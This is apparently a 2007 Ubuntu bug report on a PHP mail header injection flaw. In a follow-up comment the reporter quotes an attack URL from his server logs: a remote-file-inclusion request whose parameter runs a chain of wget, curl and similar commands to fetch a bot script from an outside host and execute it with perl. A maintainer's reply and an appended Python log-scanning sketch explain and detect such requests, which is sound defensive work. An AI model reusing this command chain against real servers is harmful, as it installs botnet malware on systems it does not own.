PHP Folded Mail Headers Email Header Injection Vulnerability

Bug #113249 reported by Jim Tarvid
Affects | Status | Importance | Assigned to | Milestone
php-mail (Ubuntu) | Fix Released | High | Kees Cook |

Bug Description

Binary package hint: php-mail

My 6.06.1 LTS web server is being pummeled.

I am going to break 50 sites by turning off mail in php.ini.

Not Vulnerable: PHP PHP 5.2.2

http://www.securityfocus.com/bid/23145

Kees Cook (kees) wrote :

Thanks for taking the time to report this bug and helping to make Ubuntu better. This problem has already been addressed with the following USN:

http://www.ubuntu.com/usn/usn-455-1

Please feel free to report future bugs.

Changed in php-mail:
assignee: nobody → keescook
importance: Undecided → High
status: Unconfirmed → Fix Released
Jim Tarvid (tarvid) wrote : Re: [Bug 113249] Re: PHP Folded Mail Headers Email Header Injection Vulnerability

The default installation leaves servers vulnerable.

Having spent some time on PHP security I still have not found an
acceptable compromise of functionality and security.

The latest exploit here involved urls like -

http://silverdollarmusicpark.com/index1.php?content=http://kuskitiz0r.kit.net/cmdpriv8/tool25.dat?&cmd=cd
/tmp;wget http://msnpassport.t5.com.br/bot/b0tnet.txt;fetch
http://msnpassport.t5.com.br/bot/b0tnet.txt;curl -O
http://msnpassport.t5.com.br/bot/b0tnet.txt;lynx
http://msnpassport.t5.com.br/bot/b0tnet.txt > b0tnet.txt;GET
http://msnpassport.t5.com.br/bot/b0tnet.txt > b0tnet.txt;lwp-download
http://msnpassport.t5.com.br/bot/b0tnet.txt;perl b0tnet.txt

; Whether to allow include/require to open URLs (like http:// or
ftp://) as files.
allow_url_include = Off

plugs this hole (I think)

/etc/php5/apache2/php.ini should be reasonably safe by default.

On 5/14/07, Kees Cook <email address hidden> wrote:
> Thanks for taking the time to report this bug and helping to make Ubuntu
> better. This problem has already been addressed with the following USN:
>
> http://www.ubuntu.com/usn/usn-455-1
>
> Please feel free to report future bugs.
>
> ** Visibility changed to: Public
>
> ** Changed in: php-mail (Ubuntu)
> Importance: Undecided => High
> Assignee: (unassigned) => Kees Cook
> Status: Unconfirmed => Fix Released
>

Kees Cook (kees) wrote :

The latter part of that URL would imply a PHP script's insecure use of a "system" or "passthru" call. The earlier part would imply, as you say, a url-load from "include" (or "fopen") where an application has not validated the file path. Either way, these are problems specific to the script, not php5 itself.

Since this bug report was related to CVE-2007-1718 and has been closed, please move the discussion elsewhere:
- If there is a bug specific to php5 itself, please open a new bug report.
- If you're interested in seeing the default setting for "allow_url_include" to be changed, please bring this up on the ubuntu-devel mailing list. Note, however, that the system default on current Ubuntu systems is already "allow_url_include = Off".

Thanks again for the report, and please feel free to report any new bugs you may find.
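
Added example, not part of the original thread and not Ubuntu or PHP project code: a log triage sketch in Python that flags the two request patterns described in the comment above, a query parameter whose value is a remote URL (reaching "include"/"fopen") and one carrying shell chaining characters (reaching "system"/"passthru"). It assumes combined-format access logs; the log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL points at include()/fopen() use.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Command chaining or substitution in a value points at system()/passthru() use.
SHELL_META_RE = re.compile(r'[;|`]|\$\(|&&')

# Constructed sample lines (documentation addresses and example hosts).
SAMPLE_LOG = [
    '203.0.113.9 - - [14/May/2007:10:01:02 +0000] '
    '"GET /index1.php?content=news HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/May/2007:10:01:05 +0000] '
    '"GET /index1.php?content=http://files.example.net/tool.dat?&cmd=cd%20/tmp;ls'
    ' HTTP/1.1" 200 812',
    '203.0.113.8 - - [14/May/2007:10:01:09 +0000] '
    '"GET /search.php?q=a%26b HTTP/1.1" 200 900',
]

def classify_request(target):
    """Return sorted (parameter, finding) pairs for one request target."""
    findings = set()
    query = urlsplit(target).query
    # Split on '&' only, so a ';' inside a value is kept and inspected.
    for name, value in parse_qsl(query, keep_blank_values=True, separator='&'):
        if REMOTE_URL_RE.match(value):
            findings.add((name, "remote-url-value"))
        if SHELL_META_RE.search(value):
            findings.add((name, "shell-metacharacters"))
    return sorted(findings)

def scan(lines):
    """Map each flagged script path to the findings seen for it."""
    hits = {}
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line in the assumed format
        findings = classify_request(m.group(1))
        if findings:
            hits.setdefault(urlsplit(m.group(1)).path, set()).update(findings)
    return {path: sorted(found) for path, found in hits.items()}

if __name__ == "__main__":
    for path, found in scan(SAMPLE_LOG).items():
        print(path, found)
```

A flagged path only shows that such a request was received; the script named in it still has to be reviewed to see whether the parameter actually reaches an include or a shell call.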

This report contains Public Security information  
Everyone can see this security related information.